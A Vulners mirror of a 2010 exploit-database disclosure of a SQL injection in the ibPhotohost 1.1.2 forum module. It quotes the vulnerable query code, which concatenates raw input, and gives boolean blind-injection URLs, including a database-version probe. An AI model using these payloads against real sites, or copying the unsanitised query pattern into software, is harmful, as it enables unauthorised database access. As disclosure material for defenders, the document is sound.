Lucene search
K

ibPhotohost 1.1.2 SQL Injection Vulnerability

🗓️ 22 Sep 2010 00:00:00Reported by fred777Type 
zdt
 zdt
🔗 0day.today👁 18 Views

ibPhotohost 1.1.2 SQL Injection Vulnerability in imgupload_i

Code
=============================================
ibPhotohost 1.1.2 SQL Injection Vulnerability
=============================================

#################################################
+
+  Title:       ibPhotohost 1.1.2 SQL Injection
+  Author:      fred777 - [fred777.5x.to]
+  Link:        http://mods.invisionize.com/index.php/f/7609
+  Vuln:        index.php?autocom=photohost&CODE=04&img=[SQL Injection]
+  Greetzz to:  back2hack,free-hack,hackbase,c-c
+  Contact:     [email protected]
+
#################################################
   
--[ Vuln Code ] --
   
$id = $this->ipsclass->input['img'];
 
    $this->ipsclass->DB->simple_construct(array(
    'select' => '*',
    'from' => 'imgupload',
    'where' => 'imgupload_id=' . $id,
    'order' => 'imgupload_date asc'
    ));
   
################################################
   
--[ Exploitable ]--
   
http://site/index.php?autocom=photohost&CODE=04&img=[SQL Injection]
 
http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=1--+ => true
http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=0--+ => false
 
http://site/index.php?autocom=photohost&CODE=04&img=1+and+substring(version(),1,1)=5
 
################################################



#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1
18